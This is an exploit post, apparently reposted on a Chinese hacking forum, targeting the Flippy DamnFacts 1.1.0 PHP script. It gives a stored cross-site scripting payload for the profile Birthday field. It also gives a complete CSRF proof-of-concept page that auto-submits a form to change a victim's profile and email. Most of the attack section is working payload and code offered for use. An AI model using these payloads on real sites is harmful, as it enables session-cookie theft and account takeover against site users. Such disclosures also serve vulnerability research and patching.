Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Cross-Site Scripting / Cross-Site Request Forgery - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月4日2年前

# Exploit Title:  Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent cross site scripting / Cross site request forgery
# Date: 2018-05-20
# Dork: N/A
# Exploit Author: borna nematzadeh (L0RD)
# Vendor Homepage: https://www.codegrape.com/item/flippy-damnfacts-viral-fun-facts-sharing-script/3630
# Version: 1.1.0
# Tested on: Kali linux

# POC 1 : Persistent Cross site scripting :
1) After creating an account , navigate to "Edit profile" .
2) Put this payload into the "Birthday" and save changes :
" onmouseover=alert(document.cookie) "
3) You will have an alert box in the page .

# POC 2 : Cross site request forgery :

<html>
<head>
  <title>CSRF POC</title>
</head>
  <body>
    <form action="http://damnfacts.flippydemos.com/submit_profile.php" method="POST">
      <input type="hidden" name="sex" value="Male" />
      <input type="hidden" name="birthday" value="test" />
      <input type="hidden" name="uEmail" value="ninjaassassinbn&#64;yahoo&#46;com" />
      <input type="hidden" name="country" value="United&#32;States" />
      <input type="hidden" name="about" value="test" />
    </form>
    <script>
      document.forms[0].submit();
      // profile will be updated successfully.
    </script>
  </body>
</html>

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Cross-Site Scripting / Cross-Site Request Forgery

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索